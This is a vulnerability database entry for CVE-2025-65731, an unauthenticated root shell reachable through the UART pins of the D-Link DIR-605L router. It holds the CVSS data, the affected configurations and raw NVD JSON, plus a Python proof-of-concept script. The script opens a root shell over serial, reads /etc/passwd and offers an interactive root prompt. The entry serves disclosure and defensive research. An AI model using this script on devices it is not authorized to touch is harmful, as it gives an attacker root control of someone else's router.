Security Vulnerability Report
中文
CVE-2025-65731 CVSS 6.8 MEDIUM

CVE-2025-65731

Published: 2026-01-08 19:15:57
Last Modified: 2026-01-30 01:07:50
Source: [email protected]

Description

An issue was discovered in D-Link Router DIR-605L (Hardware version F1; Firmware version: V6.02CN02) allowing an attacker with physical access to the UART pins to execute arbitrary commands due to presence of root terminal access on a serial interface without proper access control.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:dlink:dir-605l_firmware:6.02cn02:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:dlink:dir-605l:f1:*:*:*:*:*:*:* - NOT VULNERABLE
D-Link DIR-605L Hardware version F1 with Firmware version V6.02CN02

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-65731 PoC - D-Link DIR-605L UART Root Access # Author: Security Researcher # Note: Physical access to device UART pins required import serial import time import sys def connect_uart(port='/dev/ttyUSB0', baudrate=115200): """ Establish connection to router UART interface Args: port: Serial port device path baudrate: Communication speed (typically 115200 for routers) Returns: Serial connection object """ try: ser = serial.Serial( port=port, baudrate=baudrate, bytesize=serial.EIGHTBITS, parity=serial.PARITY_NONE, stopbits=serial.STOPBITS_ONE, timeout=1 ) print(f"[+] Connected to UART on {port}") return ser except Exception as e: print(f"[-] Failed to connect: {e}") return None def exploit_uart(ser): """ Exploit UART interface to gain root shell access Interact with the exposed root shell without authentication """ print("[+] Waiting for boot completion...") time.sleep(3) # Read initial boot output output = b"" start_time = time.time() while time.time() - start_time < 10: if ser.in_waiting: data = ser.read(ser.in_waiting) output += data print(data.decode('utf-8', errors='ignore'), end='') time.sleep(0.1) # Send commands to verify root access commands = [ "id\n", # Check current user (should be root) "cat /etc/passwd\n", # Read password file "uname -a\n", # System information "ls -la /\n" # List root directory ] print("\n[+] Executing commands via exposed root shell:\n") for cmd in commands: ser.write(cmd.encode()) time.sleep(0.5) response = b"" while ser.in_waiting: response += ser.read(ser.in_waiting) print(response.decode('utf-8', errors='ignore')) # Interactive shell print("[+] Root shell access obtained! Entering interactive mode...") print("[!] Press Ctrl+C to exit\n") try: while True: cmd = input("root@DIR-605L:/# ") ser.write((cmd + "\n").encode()) time.sleep(0.3) response = b"" while ser.in_waiting: response += ser.read(ser.in_waiting) print(response.decode('utf-8', errors='ignore')) except KeyboardInterrupt: print("\n[-] Exiting...") ser.close() def main(): if len(sys.argv) < 2: print("Usage: python3 cve-2025-65731_poc.py <serial_port>") print("Example: python3 cve-2025-65731_poc.py /dev/ttyUSB0") sys.exit(1) port = sys.argv[1] ser = connect_uart(port) if ser: exploit_uart(ser) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65731", "sourceIdentifier": "[email protected]", "published": "2026-01-08T19:15:57.217", "lastModified": "2026-01-30T01:07:50.193", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in D-Link Router DIR-605L (Hardware version F1; Firmware version: V6.02CN02) allowing an attacker with physical access to the UART pins to execute arbitrary commands due to presence of root terminal access on a serial interface without proper access control."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:P/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "PHYSICAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:dlink:dir-605l_firmware:6.02cn02:*:*:*:*:*:*:*", "matchCriteriaId": "E5378903-2A67-4BF6-BD10-ACA69D07308B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:dlink:dir-605l:f1:*:*:*:*:*:*:*", "matchCriteriaId": "283D58BD-E058-4403-895F-6B7EADEF30E6"}]}]}], "references": [{"url": "https://gist.github.com/whitej3rry/f142a93bac360f9b1126f552f64957ea", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/whitej3rry/CVE-2025-65731", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.dlink.com/en/security-bulletin/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.dlink.com/uk/en/products/dir-605l-wireless-n-300-home-cloud-router", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://gist.github.com/whitej3rry/f142a93bac360f9b1126f552f64957ea", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/whitej3rry/CVE-2025-65731", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.